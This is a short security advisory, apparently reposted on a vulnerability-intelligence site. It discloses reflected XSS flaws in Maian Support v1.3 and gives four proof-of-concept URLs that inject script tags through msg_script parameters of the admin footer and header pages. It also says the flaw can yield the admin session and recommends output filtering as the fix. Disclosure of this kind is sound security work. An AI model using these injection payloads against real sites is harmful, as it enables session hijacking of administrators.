Maian Support v1.3 XSS vulnerabilities found by IRCRASH team, discovered by Khashayar Fereidani and Dr.Crash. Admin session can be obtained through the vulnerability. Solution: edit source code and filter variables with htmlspecialchar() function.
`----------------------------------------------------------------
Script : Maian Support v1.3
Type : Xss Vulnerabilities
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
----------------------------------------------------------------
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
----------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
----------------------------------------------------------------
XSS 1 : http://Example/admin/inc/footer.php?msg_script="<script>alert('xss')</script>
XSS 2 : http://Example/admin/inc/footer.php?msg_script2="<script>alert('xss')</script>
XSS 3 : http://Example/admin/inc/footer.php?msg_script3="<script>alert('xss')</script>
XSS 3 : http://Example/admin/inc/header.php?msg_script2="<script>alert('xss')</script>
You Can Get Admin Session With This Vuln ....
----------------------------------------------------------------
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function .......
----------------------------------------------------------------
TNx : God......
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
----------------------------------------------------------------
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo